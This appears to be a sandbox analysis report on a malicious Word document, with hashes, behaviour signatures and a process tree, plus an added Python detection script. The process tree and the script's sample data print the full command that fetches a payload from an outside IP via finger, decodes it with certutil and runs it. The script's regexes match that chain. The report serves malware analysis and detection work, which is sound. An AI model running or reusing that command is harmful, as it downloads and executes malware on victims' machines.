Analysis

  • max time kernel
    120s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    16-01-2021 06:55

General

  • Target

    321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc

  • Size

    118KB

  • MD5

    f95643710018c437754b8a11cc943348

  • SHA1

    f590e1b6a80cf3e8360388382eabb04b3e247b78

  • SHA256

    321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67

  • SHA512

    f39abfd51e62f145376b5587cd515072e01740e10e967f401057c00403017c6754264bed08f8bef819829a80762ce572b40463b7854db33a961ff2e624509fba

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process (1 IoC)

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory (1 IoC)
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings (1 TTP, 9 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious use of SetWindowsHookEx (2 IoCs)
  • Suspicious use of WriteProcessMemory (10 IoCs)

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:932
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1996
    • C:\Windows\system32\cmd.exe
      cmd /C finger nc20@184.164.146.102 > %appdata%\vUCooUr >> %appdata%\vUCooUr1 && certutil -decode %appdata%\vUCooUr1 %appdata%\vUCooUr.exe &&cmd /C del %appdata%\vUCooUr1 && %appdata%\vUCooUr.exe
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1648
      • C:\Windows\system32\finger.exe
        finger nc20@184.164.146.102
        2⤵
          PID:1060
        • C:\Windows\system32\certutil.exe
          certutil -decode C:\Users\Admin\AppData\Roaming\vUCooUr1 C:\Users\Admin\AppData\Roaming\vUCooUr.exe
          2⤵
            PID:2020
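The cmd.exe command line under PID 1648 is the entire delivery chain in one line: finger.exe queries nc20@184.164.146.102 and the finger-protocol reply is written to a file (stdout is redirected twice and cmd.exe honours the last redirection, which is why only %appdata%\vUCooUr1 appears under Downloads), certutil -decode base64-decodes that file to vUCooUr.exe, the encoded copy is deleted, and the executable is launched. Nothing here is a new technique; both binaries are signed Windows LOLBins, so the detection value lies in the parent chain and the argument shapes, not in the images. The following is an added detection example, not part of this report and not the sandbox vendor's code: it walks Sysmon-style process-creation records, reconstructs ancestry, and flags any command line carrying a finger download or a certutil decode that descends from an Office process, pulling out the finger target and the decode output path as IOCs. The records are constructed from the tree above; the parent PID 500 for WINWORD and cmd.exe's parent being WINWORD (PID 932) are assumptions (the report's indentation places cmd.exe under WINWORD but marks it depth 1), and the document name is shortened.

```python
"""Added example: flag the finger -> certutil -decode chain from this report.

Not the sandbox vendor's code. Events are constructed to mirror the process
tree in the report; PPIDs the report does not show are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed Sysmon-style (Event ID 1) records. PIDs and command lines match the
# report; ppid 500 for WINWORD and ppid 932 for cmd.exe are assumptions.
SAMPLE_EVENTS = [
    ProcEvent(932, 500, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sample.doc"'),
    ProcEvent(1996, 932, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    ProcEvent(1648, 932, r"C:\Windows\system32\cmd.exe",
              r"cmd /C finger nc20@184.164.146.102 > %appdata%\vUCooUr >> %appdata%\vUCooUr1 "
              r"&& certutil -decode %appdata%\vUCooUr1 %appdata%\vUCooUr.exe "
              r"&&cmd /C del %appdata%\vUCooUr1 && %appdata%\vUCooUr.exe"),
    ProcEvent(1060, 1648, r"C:\Windows\system32\finger.exe", r"finger nc20@184.164.146.102"),
    ProcEvent(2020, 1648, r"C:\Windows\system32\certutil.exe",
              r"certutil -decode C:\Users\Admin\AppData\Roaming\vUCooUr1 C:\Users\Admin\AppData\Roaming\vUCooUr.exe"),
]

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# finger <user>@<host>: the finger reply is the download channel.
FINGER_RE = re.compile(r"\bfinger(?:\.exe)?\s+(?P<user>[^\s@]+)@(?P<host>[\w.\-]+)", re.I)
# certutil -decode <base64 file> <output>: the decode step.
CERTUTIL_RE = re.compile(r"\bcertutil(?:\.exe)?\s+-decode\s+(?P<src>\S+)\s+(?P<dst>\S+)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(events, pid):
    """Return [self, parent, grandparent, ...] for pid, stopping at an unknown parent or a cycle."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def analyse(events):
    """One finding per event whose command line carries a finger download or a certutil decode."""
    findings = []
    for e in events:
        finger = FINGER_RE.search(e.cmdline)
        decode = CERTUTIL_RE.search(e.cmdline)
        if not (finger or decode):
            continue
        office = next((a for a in ancestors(events, e.pid)[1:]
                       if basename(a.image) in OFFICE_IMAGES), None)
        finding = {"pid": e.pid, "image": basename(e.image),
                   "office_ancestor": office.pid if office else None}
        if finger:
            finding["c2_host"], finding["c2_user"] = finger["host"], finger["user"]
        if decode:
            finding["decode_src"], finding["decode_dst"] = decode["src"], decode["dst"]
        # Office -> shell -> LOLBin is the high-confidence shape; the same
        # commands typed by an admin with no Office ancestor rate lower.
        finding["severity"] = "high" if office else "medium"
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f)
```

Because cmd.exe's own command line already contains both stages, the rule fires three times on this tree (cmd.exe, finger.exe, certutil.exe); in production, key on the cmd.exe hit for alerting and keep the child hits as corroboration, since finger.exe on its own is rare enough to be worth a lower-severity signal even without an Office ancestor.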

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion (1): Modify Registry, T1112

Downloads

  • C:\Users\Admin\AppData\Roaming\vUCooUr1
    MD5
    cf1c89f9c31ba34c4a84c26e13f9c6a2
    SHA1
    3ffe882b0b0df619e046d6b589438b5652fb9b17
    SHA256
    29d9868db914315b380fa6629d7205fe2c00f8186c4164a08fd30c4fe449793c
    SHA512
    5b1d2c81ac636a9ead6b99fa510ad9a8b604072c9a82a7b3d2e1e6f4c0d82556b4ab1de761fd8f0798b871e8b8f3a4bf7345e9625f11cbfe653857e00dc84aab
  • memory/932-3-0x00000000008F3000-0x00000000008F5000-memory.dmp
    Filesize
    8KB
  • memory/932-4-0x00000000008F5000-0x00000000008F9000-memory.dmp
    Filesize
    16KB
  • memory/1060-5-0x0000000000000000-mapping.dmp
  • memory/1996-2-0x0000000000000000-mapping.dmp
  • memory/2020-6-0x0000000000000000-mapping.dmp